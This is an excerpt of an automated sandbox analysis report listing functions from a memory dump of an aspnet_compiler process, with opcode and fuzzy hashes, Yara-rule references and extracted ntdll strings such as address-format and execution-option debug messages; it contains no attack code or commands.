                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 774abe6a14e4574e9b184b9e2568c69bbcf9dce188e4caecb568764a850c4f05
                                                                                                        • Instruction ID: c54b87dff85f07beed3563cfcb55e34012a25fa8821dccd8a926689781d5dcdd
                                                                                                        • Opcode Fuzzy Hash: 774abe6a14e4574e9b184b9e2568c69bbcf9dce188e4caecb568764a850c4f05
                                                                                                        • Instruction Fuzzy Hash: 5F900229225414020245B558060450B4465A7D6351395C025F14165A0CC6218A655323
                                                                                                        Function 017C2AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6b364601aac000bb7b740e17eaa83a81f66d83dc7aabbfffc9c66e3bd73626eb
                                                                                                        • Instruction ID: b9979bec5677a83a214b2ba7d440712856a95e6297468550018a3e3d7399abaf
                                                                                                        • Opcode Fuzzy Hash: 6b364601aac000bb7b740e17eaa83a81f66d83dc7aabbfffc9c66e3bd73626eb
                                                                                                        • Instruction Fuzzy Hash: FE900229215414030205B5580704507406697D5351355C031F1015560CD6218A615223
                                                                                                        Function 017C2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3927bc401d437c6ab1c8ddc6696ecff6a2fc62545e5581a8a6f43d014c6f354
                                                                                                        • Instruction ID: 8be032e9b929a9129dc46eb75e8fcae64b69b3d469f2792bc2841b125c13bf27
                                                                                                        • Opcode Fuzzy Hash: c3927bc401d437c6ab1c8ddc6696ecff6a2fc62545e5581a8a6f43d014c6f354
                                                                                                        • Instruction Fuzzy Hash: 2D9002A5205554924600B2588404B0A852597E0201B55C026E1054570CC5258A519237
                                                                                                        Function 017C3D70 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cb0fa6cb794a2a5d784383cea244ceed663c0f839c47145ea74906ef0aa8c418
                                                                                                        • Instruction ID: 17be49b1f5340498e1f26e58a5616112438d7d1bd37a90c8e6a4ed06b182cc2d
                                                                                                        • Opcode Fuzzy Hash: cb0fa6cb794a2a5d784383cea244ceed663c0f839c47145ea74906ef0aa8c418
                                                                                                        • Instruction Fuzzy Hash: 4690023920541802D61071585804646406697D0301F55D421E0424568DC6548AA1A223
                                                                                                        Function 017C2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c845b55f50aa3dd25ce9e56a7c50e06a2179d6a118ddf97ac2146a1ee6e1eb1a
                                                                                                        • Instruction ID: fdd1fa98d5dc2f6a3ddd8bfa6e28c169a74c0281e8cbf5dd54d816b51812ed1b
                                                                                                        • Opcode Fuzzy Hash: c845b55f50aa3dd25ce9e56a7c50e06a2179d6a118ddf97ac2146a1ee6e1eb1a
                                                                                                        • Instruction Fuzzy Hash: 7A90022530541403D240715854186068025E7E1301F55D021E0414564CD9158A565323
                                                                                                        Function 017C2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1ecbc3d4767246b8e9691ce71cfbd7c8c809d3ce46c9263f3883b9847be0cfe5
                                                                                                        • Instruction ID: 615d53b83146f51d06394c2d0a184e095e66be4ff4c9fb9769a9b11683de30a7
                                                                                                        • Opcode Fuzzy Hash: 1ecbc3d4767246b8e9691ce71cfbd7c8c809d3ce46c9263f3883b9847be0cfe5
                                                                                                        • Instruction Fuzzy Hash: 2F90022D21741402D2807158540860A402597D1202F95D425E0015568CC9158A695323
                                                                                                        Function 017C3D10 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e70608a9cb4c32f44c41137d161d51b5270e8504bb94ab15d94a148f66a8f1fb
                                                                                                        • Instruction ID: 0cb4c18b30f7334de5bb6b4503848472b1eddafc948e395e2c7c6b0ca293f21f
                                                                                                        • Opcode Fuzzy Hash: e70608a9cb4c32f44c41137d161d51b5270e8504bb94ab15d94a148f66a8f1fb
                                                                                                        • Instruction Fuzzy Hash: D790023520641542964072585804A4E812597E1302B95D425E0015564CC9148A615323
                                                                                                        Function 017C2D00 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d6dbd0fc5584f409c94f7225f39dba45af72dfbc807d51e5c3646b76cf75b484
                                                                                                        • Instruction ID: e92d08cc121a88a1a73500febaa4565d1146fe9b8b95f528db6cbe5e74b2175a
                                                                                                        • Opcode Fuzzy Hash: d6dbd0fc5584f409c94f7225f39dba45af72dfbc807d51e5c3646b76cf75b484
                                                                                                        • Instruction Fuzzy Hash: 2C90022520945842D20075585408A06402597D0205F55D021E10645A5DC6358A51A233
                                                                                                        Function 017C2DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2f2b572f8e47dbbfb6f6c47bb558c7784c2b11596835c0738a1f32f28ac6cc92
                                                                                                        • Instruction ID: 5a7fb446c116ffc1e40859f8a1eaed57e5e1ba684cc5d3b5c6c60bc4e15eefe9
                                                                                                        • Opcode Fuzzy Hash: 2f2b572f8e47dbbfb6f6c47bb558c7784c2b11596835c0738a1f32f28ac6cc92
                                                                                                        • Instruction Fuzzy Hash: E4900225246455525645B15844045078026A7E0241795C022E1414960CC5269A56D723
                                                                                                        Function 017C2DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f9fd13e7f59d0e3896147efc2124b4cb4270196d2b776389c51946ba8478d7ce
                                                                                                        • Instruction ID: afad14760e3898a9f421a59581f106d356599dccab92e5f5b75177fd2b18b63b
                                                                                                        • Opcode Fuzzy Hash: f9fd13e7f59d0e3896147efc2124b4cb4270196d2b776389c51946ba8478d7ce
                                                                                                        • Instruction Fuzzy Hash: 5E90023524541802D241715844046064029A7D0241F95C022E0424564EC6558B56AB63
                                                                                                        Function 017C2C60 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbad6528cde065d7f95b79fa367908552f7b1d462d6b3f07f16111107fd3de5c
                                                                                                        • Instruction ID: 42d27c82410e6a42092bafae1d49bb70eecadf7e38774b039bca0ff3c3ec1ed5
                                                                                                        • Opcode Fuzzy Hash: dbad6528cde065d7f95b79fa367908552f7b1d462d6b3f07f16111107fd3de5c
                                                                                                        • Instruction Fuzzy Hash: AC90023520541C42D20071584404B46402597E0301F55C026E0124664DC615CA517623
                                                                                                        Function 017C2CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5b0bb0acc2e71662fcf26e902c9578b6cedc25a07f4e3730881c95a651868011
                                                                                                        • Instruction ID: 1d2b4b494ec14394cbd665a45f4e5d4b1cc6846d77ea34e67dbaa2224ea32a29
                                                                                                        • Opcode Fuzzy Hash: 5b0bb0acc2e71662fcf26e902c9578b6cedc25a07f4e3730881c95a651868011
                                                                                                        • Instruction Fuzzy Hash: 0D90023520541803D20071585508707402597D0201F55D421E0424568DD6568A516223
                                                                                                        Function 017C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 763c3cae76f910689797a1faaaa7a47eab43395c1f7fca401a761abdbae05faa
                                                                                                        • Instruction ID: 57665e36d3e35c43c9dae6d264e457c52c466fdcd3d05d3004b2c87f72330786
                                                                                                        • Opcode Fuzzy Hash: 763c3cae76f910689797a1faaaa7a47eab43395c1f7fca401a761abdbae05faa
                                                                                                        • Instruction Fuzzy Hash: B190022560941802D24071585418706403597D0201F55D021E0024564DC6598B5567A3
                                                                                                        Function 017C2CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5ef5a747c0856876ff12022b1fc75b3d8e91d4b0617f13d53436d77f6e1ca5e7
                                                                                                        • Instruction ID: ecb50a1cd38f8495cbc5110ab8ab3c242a18ac5fb004f8814925174377b75f9b
                                                                                                        • Opcode Fuzzy Hash: 5ef5a747c0856876ff12022b1fc75b3d8e91d4b0617f13d53436d77f6e1ca5e7
                                                                                                        • Instruction Fuzzy Hash: DB90023520541802D20075985408646402597E0301F55D021E5024565EC6658A916233
                                                                                                        Function 017C2F60 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c9ab123fc572678bab0a05120a8ebf242adc2b4fc83df47f9d0aed81e5b9a08e
                                                                                                        • Instruction ID: abdf1ee623205da83ac80fad1522007b5aaea5c927c58e8b6d32bb4348bc8e49
                                                                                                        • Opcode Fuzzy Hash: c9ab123fc572678bab0a05120a8ebf242adc2b4fc83df47f9d0aed81e5b9a08e
                                                                                                        • Instruction Fuzzy Hash: 1090026521541442D20471584404706406597E1201F55C022E2154564CC5298E615227
                                                                                                        Function 017C2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c7307d23d24a95adc396571c21d325cec40821d7865732c7e94c74cde592904b
                                                                                                        • Instruction ID: 4aabd9fdff250f4805a1de410eb155064d42f3005ed0e45972cb367193d9a0ec
                                                                                                        • Opcode Fuzzy Hash: c7307d23d24a95adc396571c21d325cec40821d7865732c7e94c74cde592904b
                                                                                                        • Instruction Fuzzy Hash: F190026534541842D20071584414B064025D7E1301F55C025E1064564DC619CE526227
                                                                                                        Function 017C2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 38e23a022c8db4cf7f047d5cc06ffa07c631acfcc1081fd2260833950d414f6f
                                                                                                        • Instruction ID: 70d7fc91e2ea36826731250ba35439a9975ddbe2f2ab65fd24c3a4ba07da3b9c
                                                                                                        • Opcode Fuzzy Hash: 38e23a022c8db4cf7f047d5cc06ffa07c631acfcc1081fd2260833950d414f6f
                                                                                                        • Instruction Fuzzy Hash: 00900225215C1442D30075684C14B07402597D0303F55C125E0154564CC9158A615623
                                                                                                        Function 017C2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3d4606e068fbeb50c51fa6d0c7fb224084f590a3df2a8e23f4ca44550a8fe410
                                                                                                        • Instruction ID: 10ee1cdd306dd6d1e335201530c8fc77a6b3c0f33f4658e053e166e4d8ae57ef
                                                                                                        • Opcode Fuzzy Hash: 3d4606e068fbeb50c51fa6d0c7fb224084f590a3df2a8e23f4ca44550a8fe410
                                                                                                        • Instruction Fuzzy Hash: 86900225605414424240716888449068025BBE1211755C131E0998560DC5598A655767
                                                                                                        Function 017C2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7bde6377986e73fb06dc28b29d13d919d081642261ff342592906e0623f14e04
                                                                                                        • Instruction ID: 301555cdd3405cb76eb17224228d9a7a8be48c666a91d7ba96419aa06cef8dfc
                                                                                                        • Opcode Fuzzy Hash: 7bde6377986e73fb06dc28b29d13d919d081642261ff342592906e0623f14e04
                                                                                                        • Instruction Fuzzy Hash: ED90023520581802D20071584808747402597D0302F55C021E5164565EC665CA916633
                                                                                                        Function 017C2F90 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e4eed06e53e36fba5bd21176205ce15698b0d25fd5a23b8f9970df00f4fb91c6
                                                                                                        • Instruction ID: adcb4893144d5c43a5569041850af221bd19e3269f3fb7f7ee952137dac14846
                                                                                                        • Opcode Fuzzy Hash: e4eed06e53e36fba5bd21176205ce15698b0d25fd5a23b8f9970df00f4fb91c6
                                                                                                        • Instruction Fuzzy Hash: 0490023520581802D2007158481470B402597D0302F55C021E1164565DC6258A516673
                                                                                                        Function 017C2E30 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e0c04e715de7706ca616a87f9d60eaedacebaa9ab8a43935cad46330df6610cb
                                                                                                        • Instruction ID: 8a3dca5864be92e5f4f7a2db2aa795c2fcee9a3f4f208686da70a23431a9c40f
                                                                                                        • Opcode Fuzzy Hash: e0c04e715de7706ca616a87f9d60eaedacebaa9ab8a43935cad46330df6610cb
                                                                                                        • Instruction Fuzzy Hash: B490022530541802D202715844146064029D7D1345F95C022E1424565DC6258B53A233
                                                                                                        Function 017C2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f93b57f4db76a579495e51c0a29b98bb7f126ea2e2e3efa215598058ed07c297
                                                                                                        • Instruction ID: b25300b61730eb209adb4d59d70432946cd52e2adc09253ddeaecc94767c2508
                                                                                                        • Opcode Fuzzy Hash: f93b57f4db76a579495e51c0a29b98bb7f126ea2e2e3efa215598058ed07c297
                                                                                                        • Instruction Fuzzy Hash: FE90026520581803D24075584804607402597D0302F55C021E2064565ECA298E516237
                                                                                                        Function 017C2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7b51f1bcea160323d9fd645ea22588ed2c1740b91c0c826943534fc667c24783
                                                                                                        • Instruction ID: 4a64ec9fc436dbbbdc80c285728ec7eaf26b25feb0808e9c7c7f74ef4ba85adc
                                                                                                        • Opcode Fuzzy Hash: 7b51f1bcea160323d9fd645ea22588ed2c1740b91c0c826943534fc667c24783
                                                                                                        • Instruction Fuzzy Hash: A690027520541802D24071584404746402597D0301F55C021E5064564EC6598FD56767
                                                                                                        Function 017C2E80 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7da18654526829f4db3b4048bef6f8b575c25eddabf5401512ba24bc0ce53369
                                                                                                        • Instruction ID: cbbf40235a21b8e0c35a9779bb2bb2a534d57bb4a7a3827482df57f54dafce3a
                                                                                                        • Opcode Fuzzy Hash: 7da18654526829f4db3b4048bef6f8b575c25eddabf5401512ba24bc0ce53369
                                                                                                        • Instruction Fuzzy Hash: 5390022560541902D20171584404616402A97D0241F95C032E1024565ECA258B92A233
                                                                                                        Function 017C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction ID: c9426cade94435567d774b5577d00b28502e669af4bd71e45f51fa75c3710862
                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Function 017C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 686ab27a6d6ba4500b643cec76a3519bc6dfe5f37d762a9181776f24e87e4b47
                                                                                                        • Instruction ID: ec5a115ac610b5f00e33b3828bf2515228e069156b1398aa8cb4e21ac30cd724
                                                                                                        • Opcode Fuzzy Hash: 686ab27a6d6ba4500b643cec76a3519bc6dfe5f37d762a9181776f24e87e4b47
                                                                                                        • Instruction Fuzzy Hash: 9751D4B6A00116BFDB11DBAC889497FFBB8BB08740B14826DE5A9D7646D374DE4087E0
                                                                                                        Function 017B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017F4742
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 017F4787
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017F4725
                                                                                                        • Execute=1, xrefs: 017F4713
                                                                                                        • ExecuteOptions, xrefs: 017F46A0
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017F46FC
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017F4655
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 72d61fcb5cf6dcfd3ebfa69efa792a9e2fe30994717f823bb2fed3bb5e2158d2
                                                                                                        • Instruction ID: e352325000b7d00ab72590cda92701fd3e64adc5e1fc71bfdcb1d4a1bfc9899f
                                                                                                        • Opcode Fuzzy Hash: 72d61fcb5cf6dcfd3ebfa69efa792a9e2fe30994717f823bb2fed3bb5e2158d2
                                                                                                        • Instruction Fuzzy Hash: 94510971600219ABEF25AAA8DCD9FEEF7B8AF94704F0400EDD605A72D1E7709A458F50
                                                                                                        Function 017CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction ID: 4744fc8565c4a778583860d3e8ffb84d8eb61db05fa9483a31e957c24c4f8069
                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction Fuzzy Hash: 6F81A070E452499EEF25CE6CC8927FEFBB1AF45BA0F18415EF861A72D1C73498408B51
                                                                                                        Function 017BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 017F7B8E
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017F7B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 017F7BAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
